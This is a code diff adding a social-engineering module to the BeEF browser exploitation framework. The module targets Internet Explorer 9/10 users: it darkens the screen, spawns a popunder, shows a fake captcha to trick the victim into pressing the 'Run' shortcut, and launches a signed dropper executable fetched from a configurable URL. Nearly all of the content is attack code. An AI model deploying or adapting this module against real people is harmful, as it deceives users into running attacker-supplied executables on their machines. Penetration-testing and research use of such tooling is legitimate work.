Working on new exploit module that abuses UI expectations on IE9/10 tricking the user to run a (signed) exe. Based on Rosario Valotta research.

modules/social_engineering/ui_abuse_ie/command.js

@@ -0,0 +1,77 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	if(beef.browser.isIE()){
+
+       getLanguage = function(){
+           var lang = null;
+           switch (beef.browser.getBrowserLanguage().substring(0,2)){
+               case "en":
+                   lang = "en";
+                   break;
+               case "it":
+                   lang = "it";
+                   break;
+           }
+           return lang;
+       };
+
+        grayOut = function(vis, options) {
+            var options = options || {};
+            var zindex = options.zindex || 50;
+            var opacity = options.opacity || 70;
+            var opaque = (opacity / 100);
+            var bgcolor = options.bgcolor || '#000000';
+            var dark=document.getElementById('darkenScreenObject');
+            if (!dark) {
+                var tbody = document.getElementsByTagName("body")[0];
+                var tnode = document.createElement('div');
+                tnode.style.position='absolute';
+                tnode.style.top='0px';
+                tnode.style.left='0px';
+                tnode.style.overflow='hidden';
+                tnode.style.display='none';
+                tnode.id='darkenScreenObject';
+                tbody.appendChild(tnode);
+                dark=document.getElementById('darkenScreenObject');
+            }
+            if (vis) {
+                var pageWidth='100%';
+                var pageHeight='100%';
+                dark.style.opacity=opaque;
+                dark.style.MozOpacity=opaque;
+                dark.style.filter='alpha(opacity='+opacity+')';
+                dark.style.zIndex=zindex;
+                dark.style.backgroundColor=bgcolor;
+                dark.style.width= pageWidth;
+                dark.style.height= pageHeight;
+                dark.style.display='block';
+            } else {
+                dark.style.display='none';
+            }
+        };
+
+        spawnPopunder = function(){
+            //TODO this will be replaced with a webpage served by BeEF
+            var pu = window.open('popunder.html','','top=0, left=0,width=500,height=500');
+            pu.blur();
+        };
+
+        if(beef.browser.isIE9()){
+           // [TAB] + shortcut
+            $(document.body).attr('onclick', 'spawnPopunder();');
+        }else if(beef.browser.isIE10()){
+           // just shortcut
+            $(document.body).attr('onclick', 'spawnPopunder();');
+
+            //TODO Using Gray-out, display the fake captcha with the 2 gifs (base64 the gif content and use dataURI inline image)
+        }else{
+           // unsupported IE version
+        }
+    }
+});
+

modules/social_engineering/ui_abuse_ie/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        ui_abuse_ie:
+            enable: true
+            category: "Social Engineering"
+            name: "User Interface Abuse (IE 9/10)"
+            description: "This module is based on Rosario Valotta research (https://sites.google.com/site/tentacoloviola/). The executable to be run needs to be signed (best thing is signing it with Symantec EV-SSL). The victim is tricked to press [TAB]+R (IE 9) or simply R (IE 10), which are keyboard shortcuts for the modeless dialog option "Run". Depending on the browser language, the modeless dialog shortcuts are different. For example, R for English, E for Italian. In order to achieve such behavior, a fake captcha is displayed."
+            authors: ["Rosario Valotta", "antisnatchor"]
+            target:
+                working: ["IE"]

modules/social_engineering/ui_abuse_ie/module.rb

@@ -0,0 +1,28 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# Based on the PoC by Rosario Valotta
+# Ported to BeEF by antisnatchor
+# For more information see: https://sites.google.com/site/tentacoloviola/
+################################################################################
+class Ui_abuse_ie < BeEF::Core::Command
+
+	def self.options
+		return [
+        {'name' => 'dropper_url', 'ui_label' => 'Executable URL (must be signed)', 'value' => 'http://dropper_url/dropper.exe'}
+		]
+  end
+
+  #TODO pre-execute -> read popunder.html, replace placeholder, and serve it mounting a new URL
+
+	def post_execute
+		content = {}
+		content['results'] = @datastore['results']
+		save content
+	end
+
+end
+

modules/social_engineering/ui_abuse_ie/templates/popunder.html

@@ -0,0 +1,13 @@
+<!DOCTYPE html>
+<html>
+<head>
+ <meta charset="utf-8" />
+ <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
+</head>
+<body style="height: 1000px" >
+<iframe id="f1" width="100" height="100"></iframe>
+<script type="text/javascript">
+ document.getElementById("f1").src="__URL-PLACEHOLDER__";
+</script>    
+</body>
+</html>